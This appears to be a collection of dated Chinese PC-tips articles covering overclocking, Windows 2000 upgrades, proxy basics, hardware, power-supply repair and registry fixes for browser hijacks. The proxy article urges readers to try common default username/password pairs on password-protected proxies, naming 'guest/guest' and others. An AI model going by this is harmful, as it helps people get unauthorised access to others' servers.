散热的措施。一般来说，每次增加核心电压的幅度越小越好，大多数的主板提供都了每档0.05V的调节，
有些主板甚至提供了0.01V的调节方式。当然，超频的原则还是能够不增加核心电压就不要增加电压。

3.软件超频的注意事项

最为著名的超频软件非SoftFSB莫属。软件超频的好处在于不用打开机箱就能调节。并且调节了
CPU主频之后不用重新启动。所以软件超频越来越受到了大多数人的欢迎。并且现在有些主板也随盘
提供了一些超频软件，例如微星的FuzzyLogic自动超频软件和技嘉的EASY TUNE Ⅲ。

但是很多人在使用软超频的时候并不是一帆风顺的，超频软件需要找到主板的PLL芯片，名牌主板
可能在超频软件中有相应的选项，但是还有很多主板就不能找到相应的主板信号，需要我们手动选择
PLL芯片类型(^17030501a^)。一般来说不同的主板使用的PLL芯片不尽相同。这我们通过观察主板的电
路就可以看到。一般来说，PLL芯片位于CPU插槽附近。还有就是软超频调节的时候如果超过了CPU超
频极限，可能会引起黑屏或者死机的现象。这时只要关掉电源重新启动就可以了。

4.超频失败的处理

超频失败之后一般会出现黑屏、死机或者不稳定等状态，怎么办？不要着急，听我慢慢道来。

(1)黑屏

出现黑屏的原因一般是超过了CPU超频极限导致的，出现黑屏之后，如果此时还没有增加CPU的核
心电压，那么不妨适当增加CPU核心电压试试，就有可能解决问题。如果增加了核心电压之后仍然没
有解决问题，那么这是属于受CPU本质限制了，还是把CPU降到能够稳定运行的频率为好。

(2)频频死机或系统不稳定

出现这类情况的原因一般是由于CPU接近超频极限了，解决的办法按照增强散热措施、增加核心
电压的顺序，一般来说，此时良好的散热对于增加系统的稳定性是大有帮助。

三、怎么才算超频成功？

我们超频的目的还在于能够稳定地使用，享受超频所带来的额外性能提升，这也是超频的乐趣所
在。什么才是超频成功的标准呢？流行的办法是通过一个计算圆周率的软件SUPERπ来验证机器的性
能以及超频的稳定性。一般来说，通过了SUPERπ104万位的运算已经能够保障系统稳定运行。同样，
也可以通过运行一些较大的程序来验证超频系统的稳定性。

四、主流处理器超频现状

1.AMD

早期的毒龙处理器由于没有锁定倍频而具有良好的超频性能，毒龙600/650MHz通过一块可以调
节倍频的主板就可以超频到900MHz甚至1GHZ左右。毒龙处理器锁定了倍频之后，破解倍频的方法在
DIYer中广泛流传，例如用铅笔联接毒龙表面的L1连接，或用含银的导电胶水来联接，甚至直接焊接
L1。雷鸟的超频性能也由于采用了0.18微米工艺，超频性能比老ATHLON大幅提升，超频方法同毒龙。

2.Intel

早期的超频极品──经典的赛扬300A，大多数能够超频到450MHz，少数能够超频到504MHz。随
着赛扬倍频的提高，赛扬处理器的超频性能越来越差，赛扬400以后的几乎没有什么超频空间。直
到采用了0.18微米工艺，铜矿核心的赛扬Ⅱ/PⅢ出现，超频性能又大大提高。特别是采用CCO核心
(1.7V核心电压)的处理器，超频能力普遍较好。

五、总结

超频不仅仅获得了性能的提升，同时也享受了DIY的乐趣，所以深受DIYER的喜爱。上面我们
讲述了一些超频的基础知识和基本方法，希望能对想超频的朋友有一些帮助。不过，最后要奉劝
大家：超频只是为了使用，所以稳定性是最重要的，一味追求CPU的超频极限而导致CPU的损坏就
得不偿失了。另外，超频具有一定的风险，要有一定的心理准备，总之，胆大心细是超频成功的
关键，最后祝大家都超频成功。


从Win98升级到Win2k

《一键清理系统垃圾》

从Win98升级到Win2k

   你已经决定好了吗，要从Windows 98升级到Windows 2000？对于大多数人而言，Windows 2000带给大家的将是一个质的飞跃。但是升级到这个新的操作系统并不是件轻松的事，因为一旦升级，就不可能回头了，除非你彻底重新安装Windows 98。
   Windows 2000专业版是微软最新推出的商用操作系统，它在Windows 9x的各种长处之上又集成了各种新技术，它可以增强你的系统的稳定性，尤其是在网络方面，在客户系统的监视、控制和配置方面你也将获益匪浅。
   在升级之前，你应该先做一个计划，检查一下当前在你机器中当前操作系统下运行的所有程序，确保它们能够与Windows 2000兼容，如果有不兼容的程序，应该与生产厂家询问是否有升级的产品。你还应该运行检测程序Windows 2000 Readiness Analyzer以确保所有的硬件、软件的组件也准备待续，你可以在微软的站点上找到这个程序，下载地址是http://download.microsoft.com/download/win2000platform/Install/1.0/W9XNT4/EN-US/chkupgrd.exe，有2.6MB，或者如果你有windows 2000的光盘，你可以执行X:\i386\winnt32 /checkupgradeonly，其中X是光驱的盘符，其中的每一个选项都有助于保证每一个硬件和软件组件能够符合windows 2000的要求。
   在你决定升级以后，下一步就应该想想怎么进行升级。你可以卸载以前的操作系统，直接安装windows 2000；或者将现在的操作系统升级；也可以将windows 2000作为第二个操作系统进行安装。下面我们就讨论一下各种方式的长长短短，以便你决定正确的安装方式。

一、卸载以前的操作系统
   直接安装windows 2000，将给你提供一个windows 2000最好的状态，你获得一个更稳定状态的可能性大多了，但是你必须花费大量的时间重新安装各种应用程序，重新设置网络参数，在进行这种安装之前，先完成下面的两个操作之一：
   如果你的系统支持可启动CD0-ROM，插入windows 2000的光盘，重新启动机器（在一些机器中你可能需要修改BIOS的设置以允许可启动光驱），按照屏幕上显示的要求一步一步进行，这时候一般可以选择FAT或者FAT 32文件系统，这样以后你可以选择升级到NTFS；如果你现在就需要NTFS所提供的安全功能，也可以直接选择NTFS。
   如果你的系统不支持可启动光驱，你可以制作4张安装软盘，具体按下面的步骤操作：
   如果是在MA-DOS状态，转换到目录X:\bootdisk，X为你的光驱的盘符。运行Makeboot，然后选择制作安装盘的驱动器；或者在WINDOWS 9X或者NT状态下，单击“开始”、“运行”，在打开输入框中输入“x:\bootdisk\makeboot a:”，其中X为你的光驱的盘符。这样将制作4张安装盘。
   将第一张安装盘插入重新启动机器，然后按照屏幕的提示进行下面的操作。

二、将现有的系统升级
   将现有的系统升级，意味着你可以保留当前所有的网络设置和应用程序。升级过程相当直截了当，只要具备安装windows的经验就可以完成这个升级过程。但是如果你当前的操作系统存在一些奇怪的问题或者有一些bug，这些问题在你安装windows 2000的过程中仍然可能困扰你。
   现在准备升级，插入windows 2000的CDROM，单击随后出现的“安装”，然后就会有硬件和软件向导带着你完成所有升级过程，整个过程中它会自己拷贝文件并完成升级。

三、安装Windows 2000作为第二个操作系统
   安装Windows 2000作为第二个操作系统，你即可以享受第一种升级方式的优点又可以保留现有的各种应用程序和网络设置，可以说是享受了齐人之福。
   Windows可以在FAT、FAT32 或 NTFS系统中与Windows 98 or Windows NT 成功地双启动，设置可以在操作系统之间共享文件和数据，这种选择可以让你在现有的环境中毫无危险地测试windows 2000的使用状态，如果经过测试，你觉得不喜欢windows 2000，可以删除windows 2000的安装文件夹，并且重新修改启动扇区，具体方法是在windows 98的MA-DOS状态下，执行 SYS C：。如果你觉得和windows 2000 有缘分，你可以删除windows 98，并且在 boot.ini 文件中删除和windows 98相关的设置。
   如果你决定采用这种安装方式，即可以将windows 2000的光盘插入光驱，然后选择升级，单击相关选项进行一次完整的安装，或者像前面提到的一样，用这张光盘重新启动机器。
   不管你决定采用什么升级方案，最好在升级之前想好，而且俗话说“不怕一万，就怕万一”，说不定会有意外事件发生哟，所以一定确保你留有退路。windows 2000并没有提供卸载功能，所以你最好将现有的数据和应用程序作个完全的备份。如果一切顺利，那就祝贺你获得了一个更稳定的操作系统吧！


代理入门基础

《一键清理系统垃圾》

代理入门基础

一、什么是代理服务器？
   代理服务器是介于浏览器和Web服务器之间的一台服务器，当你通过代理服务器上网浏览时，浏览器不是直接到Web服务器去取回网页而是向代理服务器发出请求，由代理服务器来取回浏览器所需要的信息并传送给你的浏览器。而且，大部分代理服务器都具有缓冲的功能，它不断将新取得数据储存到它本机的存储器上，如果浏览器所请求的数据在它本机的存储器上已经存在而且是最新的，那么它就不重新从Web服务器取数据，而直接将存储器上的数据传送给用户的浏览器，这样就能显著提高浏览速度和效率。Proxy Server (代理服务器)是 Internet 链路级网关所提供的一种重要的安全功能，它的工作主要在开放系统互联(OSI)型的对话层，主要的功能有：
   1、连接 Internet 与 Intranet 充当 firewall (防火墙)：因为所有内部网的用户通过代理服务器访问外界时，只映射为一个IP地址，所以外界不能直接访问到内部网；同时可以设置IP地址过滤，限制内部网对外部的访问权限。为了安全起见，很多地方都建立了firewall，而使用proxy就可以突破防火墙的限制。同样，proxy也可以用来限制封锁IP地址，禁止用户对某些网页的访问。比如大多数国内的proxy都是禁止访问VOA的（是voa com not voa org，后者是美国志愿者！），一旦试图访问就会出现禁止的字样，作为警告。好比你向报亭要一份playboy，可能不但得不到，还会被教训一顿。真是@#$%^&&*).... 这种限制是人为的，不同serve对地址的封锁是不同的。所以一个不行时可以换一个试试。（例如前一段时间对geocities的封锁）
   2、节省IP开销：如前面所讲，所有用户对外只占用一个IP，所以不必租用过多的IP地址，降低网络的维护成本。当然也有它不利的一面，如许多网络hacker通过这种方法隐藏自己的真实IP地址，而逃过监视。
   3、提高访问速度：通常代理服务器都设置一个较大的硬盘缓冲区(可能高达几个GB或更大)，当有外界的信息通过时，同时也将其保存到缓冲区中，当其他用户再访问相同的信息时，则直接由缓冲区中取出信息，传给用户，以提高访问速度。

二、什么人架设代理服务器？
   架设代理服务器的主要是ISP和一些有内部网的公司、企业和单位。ISP架设代理服务器一般是为了减小数据流量、提高用户的浏览速度，它让其用户都通过代理服务器来访问WWW网，这样，对于相当一部分经常性重复访问的数据，代理服务器就可以直接传送给用户而不用重复下载；有内部网的单位，它们可能租用了一条专线或拨号上网，但却只有这一台机器可以上网，那么就在它上面安装一个代理服务器软件吧，于是内部网的其它机器也就可以通过这个代理服务器上网了。

三、哪些人使用代理服务器？
   最直接的用户当然是教育网和科技网内的IP受限制而不能访问国外资源的贫苦大众，他们可以通过可以搜索到 ChinaNet 上那些没有设置权限限制的代理服务器，从而能够通过代理服务器访问国外资源。
   代理服务器的第二大用户群则是169用户，他们一般只能在169网内部转悠，必须通过那些横跨169网和ChinaNet的代理服务器才能访问Internet网。
   另外，有些163用户或教育科技网中可以直接访问国外的用户出于某种需要（如隐藏身份）也搜索和使用代理服务器。

四、什么是免费代理服务器？
   在使用代理猎手等软件搜索代理服务器地址时，会在验证状态栏中出现类似“要密码”、“Free”等字样。
   如果把“要密码”的代理地址设置为代理服务器，当你访问网页时，就会弹出一个对话框，要求输入“用户名”和“密码”。这说明，这台代理服务器不能免费使用，需要你向他注册得到用户名和密码才能用。当然，你如果是密码破解高手（hacker！），那就上吧！如果幸运的话，以下的“用户名/密码”说不定能用：“user/passwd”、“demo/demo”、“guest/guest”、“temp/temp”、“share/share”（有时要在密码后加上数字，像guest2等）。
   如果你把“Free”的地址设置为代理服务器，那你就会发现访问网页时不会要求你输入密码了。这就是“免费的代理服务器”。为什么会出现free的呢？
   1、是系统漏洞，一旦被网管发现就会被堵上；
   2、是善良的网管和其他有机会接近主机的人，将机器设成了代理服务器；
   3、是真正的好心人，就是将自己的机器作为免费代理，造福广大同仁。这真值得钦佩！但被查封关闭的也最快。
   4、是ISP商为了提高影响，在一段时间内免费开放，一般很短。

五、关于代理服务器的速度
   使用代理猎手2.8及以下版本搜索验证代理地址是，会出现类似“Free 3秒”、“Free 15秒”等字样，这里的3秒、15秒是指代理服务器的响应时间，时间越短，说明代理服务器的速度越快，用起来当然越爽了！
   在代理猎手3.0以下版本，验证时间栏改为“时间特性”，显示情况类似这样：“0.9│1.3│2.6”、“26.3│0.0│26.3”，这三个时间依次代表：连接时间、首次接收数据时间、总验证时间。当然也是值越小越好了。
   决定一个proxy的速度的因素有很多，主要的有：
   1. 免费代理服务器所在的网路。大家用proxy主要还是为了出国，因而，四大网络的出口局的带宽就直接决定着其中的proxy的速度。目前，除中网在16M以上外，其他都在2.6M左右，其上proxy的速度自然也不同。
   2.代理服务器的性能。前面的文章提到，proxy不过是一个大cache而已，因此它的硬盘大小，网路的带宽如何就会影响速度。这和你自己机器的是一样的。
   3.代理服务器与你的机器之间的距离。前面的文章提到，proxy主要是为特定对象服务的，其地理分布通常不会太广泛。而广大网友就不一定与你所用的proxy之间的距离有多远了。自然，距离越远，速度也就越慢。
   4. 你所访问的站点的情况。这也是影响proxy速度的原因。我偶然连到了一个美国的网页，流量达27k/s! 看了它的介绍才发现，对方架设的竟然是T3专线！你要访问对方的站点，自然要以对方的标准为主，就如同两架速度不同的modem一样。可惜很多网友常常忽略这点。
   5. 本地机器。即你所用的机器的性能配置等．一般来说，对proxy的速度影响不是很大。不妨加些内存，多设些cache之类。


电脑的常见硬件设备

《一键清理系统垃圾》

电脑的常见硬件设备

   一台电脑是由许许多多的零部件组成，只有这些零部件组合在一起协调的工作，才能称之为电脑。电脑发展到现在，其零部件都有了很大的变化，但其工作原理却没有变，其中包括主板、CPU、内存、硬盘、显卡、声卡等等。下面将简单的介绍组成电脑的各个零部件。

1. 主板
   主板是整个电脑的基板，是CPU、内存、显卡及各种扩展卡的载体。主板是否稳定关系着整个电脑是否稳定，主板的速度在一定程度上也制约着整机的速度。

2. CPU
  CPU就是中央处理器，也就是负责运算和控制的控制中心，是电脑的关键部位，相当于人的大脑一样。

3. 内存
   内存是电脑的一个临时存储器，它只负责电脑数据的中转而不能永久保存。它的容量和处理速度直接决定了电脑数据传输的快慢，和CPU、硬盘一起并称为电脑的三大件。

4. 硬盘
   硬盘是我们熟知的电脑配件之一，简单的说就是一个大容量存储器，与主机通讯速度很快，成为现代电脑不可缺少的配件。

5. 显卡
  显卡的作用就是提供对图像数据的快速处理，显卡也是电脑的重要组成部件之一，而且也是更新换代最快的一个部件，目前很多3D游戏对显卡的要求都很高，因此我们不得不掏钱重新买一块显卡来更新换代。

6. 显示器
   显示器，顾名思义就是电脑的一个显示设备，和电视原理差不多。一般来说，显示器的身价决定于它所采用的显象管，好的显象管可以提供更好的视觉效果，寿命也更长。

7. 键盘、鼠标
   鼠标、键盘一直以来都不被许多人所重视，不过它们却是现代电脑不可缺少的输入设备，没有它们就相当于人没有手一样。

8. 其它设备
   现代电脑除了上面所列举的七大类配件外，还有很多的相关配件，包括有网卡、声卡、MODEM、打印机、扫描仪，绘图仪、手写板等等很多东西，这里就不再一一列举。


电脑的软件组成

《一键清理系统垃圾》

电脑的软件组成

   如果一台电脑只有硬件的话，那么它只能说具有一副骨架而已，只有装上了软件过后，电脑才能被称之为真正的电脑。
1. 硬件驱动程序
   光是有硬件，电脑并不能工作，必须要有能驱使硬件工作的软件才能让硬件工作，这种软件就是我们平常所说的驱动程序。
   任何电脑硬件都必须要有驱动程序驱动才能工作，否则就一点用处没有。驱动程序是电脑软件中最基本的软件，也是保障电脑能顺利工作的基础。
   从WINDOWS98以后的操作系统中，都收集了很多常见设备的驱动程序，不过有些设备必须单独装驱动。各种驱动程序之间极有可能产生不兼容的情况，如果这样，你最先考虑的就是换一个驱动程序试试。

2. 操作系统
  操作系统是大家听得最多的一种软件，它为电脑中其它应用程序提供了一个操作平台，就好象我们吃饭的桌子一样为我们提供了一个可以操作平台。
  目前电脑中常见的操作系统有微软的WINDOWS98、WINDOWS2000、和WINDOWS XP，还有WINDOWS NT、linux等。

3. 应用软件
   应用程序就是我们日常用到的软件程序，这些程序可以帮助我们完成生活中的很多工作，也就是真正能体现电脑用途的东西。
   电脑发展到现在，应用软件也涉及到了社会的各个领域，几乎在能用电脑工作的地方，都能对应有一种以上的应用软件。


电脑故障检修之“望、闻、听、切”法

《一键清理系统垃圾》

电脑故障检修之“望、闻、听、切”法

   在中医学上，“望、闻、问、切”是一种传统的诊断病症的方法，今天，本人把“望、闻、听、切”四诊法应用于电脑故障的检修上，也取得了很好的效果。
   “望”即观察系统板卡的插头、插座是否歪斜，电阻、电容引脚是否相碰，表面是否烧焦，芯片表面是否开裂，主板上的铜箔是否烧断。还要查看是否有异物掉进主板的元器件之间(造成短路)，也可以看看板上是否有烧焦变色的地方，印刷电路板上的走线(铜箔)是否断裂等等。
   “闻”即辨闻主机、板卡中是否有烧焦的气味，便于发现故障和确定短路所在地。
   “听”即监听电源风扇、软/硬盘电机或寻道机构、显示器变压器等设备的工作声音是否正常。另外，系统发生短路故障时常常伴随着异常声响。监听可以及时发现一些事故隐患和帮助在事故发生时即时采取措施。
   “切”即用手按压管座的活动芯片，看芯片是否松动或接触不良。另外，在系统运行时用手触摸或靠近CPU、显示器、硬盘等设备的外壳根据其温度可以判断设备运行是否正常；用手触摸一些芯片的表面，如果发烫，则为该芯片损坏。
   下面我就简单描述一下自己的亲身体验：
   今天上午，上机一按Power电源开关时，计算机出现死一样的寂静。我不由得大吃一惊，直觉告诉我，计算机出毛病了，开机后的唯一现象，就是只有显示器通电指示灯发亮，主机电源指示灯不亮。由于我的电脑是一台6X86组装机，显示器电源线直接插在主机的电源输出插座上，因此，可以断定，从市电插座到电源线，又到主机电源插座是正常的，问题就出在主机电源以后的部件中。
   在卸掉所有的外接连线后，打开立式机箱，再将机箱上方电源部件的所有直流电源输出线和开关卸下来。这里需要指出的是，要特别注意两组主板电源线的正确位置，因为主板的两组电源线中，其中一组电源线有公共地线、＋5V和＋12V输出线，还有一根－5V输出线。另一组除了公共地线、＋5V和＋12V电源线之外，还有两根分别是－12V输出线和PG线。这两组电源线在复原时若位置搞反了，必将铸成大错。但这两组电源线安装非常简单也有特点，即两组电源的黑色地线都在中间。
   将电源部件的外壳打开后，笔者发现电源部件结构并不复杂，主要由变压器、整流、滤波和稳压部件组成。由于主机的输出功率一般有几十瓦特，而引入市电后先通过分压和整流后再由逆变电路变压，这样就使得整流、滤波和稳压电流较大，所以这些元件大都是大容量电解电容、大功率晶体管元件，且大部分都有较大的散热片散热。通过对电路板的分析，认清了电流基本走向是插座→保险管→分压功率电阻→滤波整流功率电容→功率三级晶体管→变压器→后极的稳压系统，一般高电压大电流功率元件大多数在变压器前面。
   据以往的经验可知，电源系统中最易损坏的是保险管和各功率元件，特别是在没有任何电流输出时，往往不是保险管损坏就是前端功率元件损坏，从而使得电源系统出现锁闭现象。按惯例，首先检查保险管，在仔细检查后，又用万表测试一次，保险管是好的。只可能是后级部分了，即十有八九是功率元件损坏了。检查功率型分压电阻，分压电阻直接承担将220V交流电分压为180V左右交流电的任务，断路或被击穿的可能性较大，测试它的电阻的方法既简单又方便，测试后也是完好无损。
   再来检查滤波整流电容，该电容是额定电压值为200V、容量为220μF的大容量电解电容器。显然，为了取得较为平整的、滤波系数适当的整流直流电，才采用较大容量的电解电容。由于是全波整流，因此有两个大电容器。大电容器的测试必须取下来，如果是软击穿，在非带电状态下还很难测试。为了稳妥，我先没有焊下电容器，而是认真观察电容器有没有异样，闻闻电容器有没有异味，并将两只电容器进行比较，因为一般情况下，不可能两只电容器同时损坏。通过仔细观察，我发现其中有一只电容器的顶部较另一只电容的顶部略高一点。电解电容因内部有大量电解质，若长期工作在滤电状态下，就很容易使电解液发热，这样又反过来加速电容器的漏电，当这种恶性循环发展到一定程度时，电容器要么被彻底击穿，要么电流过大使电容器断路。但有同一个现象，那就是电容器因电解液发热膨胀，出现外壳鼓起，甚至炸裂的损坏现象。可以肯定，这只电容器是有问题的。赶快买来同样额定电压和容量的电解电容替代安装。啊哈！问题就在这里。当然，在安装时一定要注意电解电容的正负级，不要搞反了。一般来讲，正规机箱中电源电路板上都有电解电容正负极标志，如果没有标明，用户在将原装电容器焊下时应用笔标明正负极。
   小结：电脑出现的故障，既有复杂故障，也有简单故障，实践证明，不管是复杂故障还是简单故障，其中大部分故障都有一定的蛛丝马迹，甚至是一些十分明显的外观表现，比如电容器体积膨胀和炸裂现象、电阻烧糊或烧黑现象、晶体管炸开或破裂现象、变压器有烧焦味等，以及那些没有安装散热片的非功率型集成块的表面出现严重发热现象等（注意：检查集成块时，只能在开机一段时间后关机，再用手指触摸集成块表面。千万不要在带电状态下触摸集成块，因为那将会因手上的高压静电击穿集成块，造成新的故障点。人的手上一般都有上万伏的高压静电，只是电量极小，很难为人感觉，但击穿集成块却绰绰有余）。只要你能通过“望、闻、听、切”，并认真分析，其中的大部分故障，你完全可以采用简单的方法来顺利解决。


电脑升级概述

《一键清理系统垃圾》

电脑升级概述

   升级，是我们听到有关电脑信息中最常用的词汇之一，那么到底什么是电脑升级呢？升级到底有什么作用呢？
   我们一般所说的升级包括两个方面：1.软件升级，2.硬件升级。
   软件升级一般是指将电脑中的软件升级到新的版本，以获得更多的功能。软件升级是电脑中经常用到的，比较简单，这里就不再多说。
   硬件升级又包括两个方面：一是硬件本身的升级，一般是指选用功能更强大的新硬件换掉原来的老硬件或者是在老机上直接加上新硬件，这类升级花费比较大。二是硬件驱动程序的升级，即是将硬件的驱动程序升级到更高的版本，以便能更好的驱动硬件设备，驱动程序一般硬件厂商都会免费提供，可以到它的网站上去下载。


电脑问题的解决方法

《一键清理系统垃圾》

电脑问题的解决方法

一: 电脑自动重启死机慢无法打开文件(软件引起的故障)

==============================
关于优化大师、魔法兔子的应用
(去这里下载:Windows 优化大师5.84官方正式版,http://www.ttpz.com/soft/267.htm)
1:用优化大师系统清理维护注册信息清理(不要备份)和垃圾文件清理,清理一下.
2:打开优化大师找到这里面的文件BackupRegistry全部删除
3:不用注册表备份
4:用软件智能卸载(删除)软件,比较删得干净一点.但必需注意:在卸载(删除)软件是最好查对一下它搜出来的要删除的内容,因为,有时它也会误删不该删的东西甚至系统文件.这样的话,你就退出优化大师,等一会再删.
5:用它的"后台服务优化"进行后台优化.设置启用自动手动.
6:可用系统磁盘医生检查磁盘的情况.
7:用它的"磁盘缘存"调节虚拟内存比较好
8:它的默认一般可以使用
9:用它查系统信息特别方便.
10:再用超级兔子魔法设置点清除垃圾点清除记录和清除文件(全选)点清除.
11: 点兔子软件点注册表优化清除垃圾.
12:点实用工具超级兔子系统救援点删除备份记录把备份记录删除.
13:点超级兔子IE助手修复IE.
点超级兔子修复专家修复IE
(注意:用这两个软件时,关闭所有打开的程序)
我个人建议:一般就用以上的几个功能,另外的就不要去用了,用了其它的功能反而会造成系统故障.
魔法兔子的用法也和优化大师差不多.不过修复IE功能特别好.
14:打开浏览器点工具点Internet选项内容个人信息自动完成分别点击“清除表单”及“清除密码”点确定。
15:打开浏览器点工具点Internet(选项)点Internet另时文件里的设置点移动文件夹,把系统盘里的另时文件夹:Temporary Internet Files转移到另外的硬盘里,点确定.
16:打开浏览器点工具点Internet(选项)点安全点受限站点点站点分别输入下面网址名称
http://www.3721.com/install/license.htm　 百度搜索伴侣　中文上网升级包　中文邮　Baidu.com.Inc 点添加点确定点确定.
17:2000系统右键点击“我的电脑点属性”，
在“系统特性”窗口中点选“高级”选项卡，然后单击其中的“启动和故障恢复”选项，把“系统失败”框中“自动重新启动”前面的对勾去掉
18:XP系统右击“我的电脑点属性点高级点设置把“系统失败”框中“自动重新启动”前面的对勾去掉就可以了。
19:点开始右击我的电脑点属性点高级点错误报告禁用错误报告
20:去这里:<1>:http://it.rising.com.cn/service/technology/tool.htm (免费流行病毒专杀工具名称)
          <2>:http:/online.rising.com.cn/瑞星在线杀毒、免费在线查毒.
21:2000XP系统还必需升级下补丁:点开始点Windows Update自动更新点驱动更新

二:IE浏览器的问题:
如果IE浏览器的问题,可先用魔法兔子点超级兔子IE助手修复IE.
也可用3721网上助手修复(不推荐使用).
1:点开始点运行输入 regedit 回车
然后根据需要修改注册表
1：保护IE默认页面
HKEY_LOCAL_MACHINESOFTWAREMicrosoftInternet ExplorerMain在右边窗口找到Default_Page_URL，将网址删除掉就可以了！
2：保护ie起始页面
HKEY_LOCAL_MACHINESOFTWAREMicrosoftInternet ExplorerMain在右边窗口找到Start Page，将自己的网页替换原来的网页！
3：保护ie标题栏
HKEY_LOCAL_MACHINESOFTWAREMicrosoftInternet ExplorerMain在右边窗口找到Window Title，将这项的内容删除（或换上自己的文字，本人就换成了“我的IE你别动”）即可。若要恢复IE默认标题栏，只需要将该字符串值删除即可！
4：去处强制运行的网页
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun在右边的窗口中把包含右网址的字符串删除掉。
5:修复电脑一开机IE就自动打开:（2000系统不可以）
  点开始点运行输入：msconfig,如果“运行”被禁用的话，就打开MS-DOS窗口模式或者我的电脑或者资源管理器在目录C:WINDOWSSYSTEM下找到msconfig.exe运行系统配置实用程序，点击“启动”，禁用一些不良网址或其他驻留程序。
6:手工方法处理。
1:点开始点程序点附件点中记事本,在记事本窗口中输入以下内容：
REGEDIT4
[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem]
DisableRegistryTools=dword:000000
2:点文件选择保存以C:reg.reg名称存盘
3:打开资源管理器选 C 盘，双点reg.reg文件
系统弹出“是否确认要将 C:reg.reg 中的信息添加进注册表？”的对话框，点“是”。　随后弹出对话框“C:reg.reg 里的信息已被成功地输入注册表。”点确定.
7:修改主页设置
    1、解除主页设置的不可用
打开 Microsoft Internet Explorer 浏览器点工具选“Internet 选项
看到主页更改框的内容均为灰色，不可更改。就打开记事本，输入以下内容：
REGEDIT4
[HKEY_CURRENT_USERSoftwarePoliciesMicrosoftInternet ExplorerControl Panel]
HomePage=dword:00000000
点文件选保存以“C:reg2.reg”名存盘.
打开资源管理器进到 C 盘，双点“reg2.reg”文件系统弹出“是否确认要将 C:reg2.reg 中的信息添加进注册表？”的对话框点是点确定
再次进入浏览器里点Internet 选项可以看到主页设置已变亮在地址栏里重新输入自己喜欢的主页地址即可。
8:找回“开始“菜单上的菜单程序“运行关闭注销”命令
打开注册表的HKEY_CURRENT_USER\Software\ Microsoft\Windows\CurrentVersion\Policies\Explorer主键，在右边窗口中有三个键值“NoRun”(没有运行)、“NoClose”(没有关闭系统)和“NoLogOff”(没有注销功能)，直接删除这三个键值即可。
9:防御防范
Windows98，打开C:WINDOWSJAVAPackagesCVLV1NBB.ZIP，把其中的“ActiveXComponent.class”删掉；WindowsMe用户，打开C:WINDOWSJAVAPackages5NZVFPF1.ZIP，把其中的“ActiveXComponent.class”删掉。删除这个组件不会影响到你正常浏览网页的。

10: 禁止使用注册表编辑器regedit.exe:
(1)运行注册表编辑器regedit.exe；
(2)展开注册表到HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem下，新建一个名为DisableRegistryTools的DWORD值，并将其值改为“1”，即可禁止使用注册表编辑器regedit.exe。
<七>:解锁(使用注册表编辑器)方法如下：
方法一:用瑞星注册表修复工具 .
去这里下载:http://it.rising.com.cn/service/technology/RegClean_download.htm
方法二:
1:用记事本编辑一个任意名字的.reg文件，比如unlock.reg，内容如下：
REGEDIT4
[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem]
DisableRegistryTools=dword:00000000 存盘。
如果要使用注册表编辑器，则双击unlock.reg即可。注意,在“REGEDIT4”后面一定要空一行，并且“REGEDIT4”中的“4”和“T”之间一定不能有空格，否则将前功尽弃！
2:把下面文件复制到记事本上，保存为扩展名为reg的文件！
REGEDIT4
[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem]
DisableRegistryTools=-
3:把下面文件复制到记事本上，保存为扩展名为reg的文件！
REGEDIT4
[-HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem]
4:把下面文件复制到记事本上，保存为扩展名为vbs的文件(说明：安装超级解霸后，vbs文件打开方式被更改了，可重新安装WSH)！
Dim WSHShell
Set WSHShell=WScript.CreateObject(WScript.Shell)
WSHShell.RegDelete HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem
5:把下面文件复制到记事本上，保存为扩展名为htm的文件！
<html>
<body>
<script language=JavaScript>
var shl=new ActiveXObject(Wscript.shell);
shl.RegWrite(HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystemDisableRegistryTools,0, REG_DWORD);
window.alert(你注册表编辑器已解除禁用)
</script>
</body>
</html>
6:把下面文件复制到记事本上，保存为扩展名为inf的文件(右键选择安装即可)!
[Version]
Signature=&#36;Chicago&#36;
[DefaultInstall]
DelReg=DeleteMe
[DeleteMe]
HKCU,SoftwareMicrosoftWindowsCurrentVersionPoliciesSystemDisableRegistryTools
7:在dos下解开注册表：
regedit/d HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem
8:把下面文件复制到记事本上，保存为扩展名为js的文件！
var WSHShell=WScript.CreateObject(WScript.Shell);
WSHShell.RegWrite(HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystemDiableRegistryTools,0,REG_DWORD);
WSHShell.RegDelete(HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem)
方法三:98恢复注册表开机按F8进dos,命令行下输入" scanreg/restore"然后选择最近日期，回车重启
或去这里:http://www.yisun.cn/tool/ie/07.htm.
<八>:安装网络防火墙. 如果是瑞星,它就有防火墙.
瑞星防火墙2004官方正式版　http://www.aidown.com/soft/1931.htm
费尔个人防火墙xfilter 2.1　http://www.onlinedown.net/soft/139.htm
江民黑客防火墙 3.12　 http://www.skycn.com/soft/15041.html
<九>:屏蔽不想去的网站:在IE中做一些设置就可永远不进该站点：
打开IE点击工具选Internet选项内容分级审查点启用调出分级审查点击许可站点输入不想去的网站网址，如输入：http://www.3721com，按从不再点确定即可.
删除记录:
打开Internet Explorer 浏览器点工具选“Internet 选项有三个地方全部把它删除.
Intrenet选项--内容--个人信息--自动完成--清除表单，清除密码
<十>:高级设置
    除了主页设置外，有一些网站还会修改浏览器的标题，鼠标右键菜单等内容,　如何把它取消呢:
  1、运行注册表工具
    点开始点运行输入regedit点确定
    如果在开始菜单上没有运行的命令,采用以下方法：打开资源管理器切换到 Windows 目录找到 regedit 程序，双点它。
  2、注册表
    注册表是一个数据库，容纳了应用程序和计算机系统的全部配置信息，系统和应用程序的初始化信息，应用程序和文档文件的关联关系，硬件设备的说明，状态和属性以及各种状态信息和数据。
    注册表编辑器则是对注册表进行各种编辑工作。
    HKEY_CLASSES_ROOT：包含了有关OLE信息，以便在系统工作过程中实现对各种文件和文档信息的访问。
    HKEY_USERS：用户根据个人爱好设置的信息。
